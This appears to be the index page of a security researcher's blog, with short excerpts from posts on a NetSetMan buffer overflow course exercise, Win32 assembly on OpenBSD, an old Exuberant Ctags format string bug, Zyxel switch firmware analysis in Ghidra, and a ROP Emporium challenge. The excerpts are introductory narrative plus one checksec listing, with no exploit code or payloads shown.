NetSetMan 4.7.1 Unicode exploit

As part of the this course the first assignment is to create a working exploit against NetSetMan 4.7.1 using a buffer overflow vulnerability. If you wish to follow along, the installer can be found on Exploit-DB. Additionally I’m using a Windows XP SP3 (EN) VM making this a no-ASLR, 32-bit setup. Fuzzing Since the assignment doesn’t state where or how to trigger the overflow we have to fuzz it first, and as it doesn’t expose any network ports this reduces the attack surface to either importing profiles or freeform text input.

Compiling win32 assembly on OpenBSD

Recently I’ve finished the Practical Malware Analysis book and I’ve wanted to familiarise myself a bit more with the Win32 API. After spending a good amount of time on setting up Visual Studio C++ for MASM (Microsoft Macro Assembler) I wanted to stab myself in the eye with a rusty fork due to the overload of visual clutter. Alas, running plain MASM on Windows 10 seems to be a no-go these days.

Poking old format string bugs

Earlier this week I ran into a fairly old format string bug in the Exuberant Ctags implementation, and it turns out this particular issue was fixed back in November 2009. However it wasn’t picked up by vendors at the time. This isn’t a critical issue, but seeing this fixed in SVN without a proper release being made afterwards resulted in only those who decided to ship a package based on a Subversion checkout to have the fix.

Exploring Zyxel GS1900 firmware with Ghidra

or, how I found multiple vulnerabilities on a lazy Sunday afternoon Earlier this year the NSA released Ghidra, a reverse engineering suite with support for a large number of CPU/MCU instruction sets. While I have some experience with Hopper and radare2 I wanted to play with Ghidra to poke around the firmware for my Zyxel GS1900-8 switch which runs on a 32-bit MIPS CPU. All in all this has turned out to be an interesting exploration of both Ghidra and the GS1900-8-2.

ROP Emporium - ret2csu

ret2csu, the final ROP Emporium challenge. This one is GLIBC-specific but nonetheless it is a fun exercise which forces you to look beyond the standard functions which the application author wrote and instead explore other parts of the binary which are essentially provided by the ecosystem. Exploring the binary Not much going on with this binary: jasper@ropper:~/ropemporium/ret2csu$ checksec ret2csu [*] '/home/jasper/ropemporium/ret2csu/ret2csu' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) And as expected there is no usefulFunction or usefulGadgets: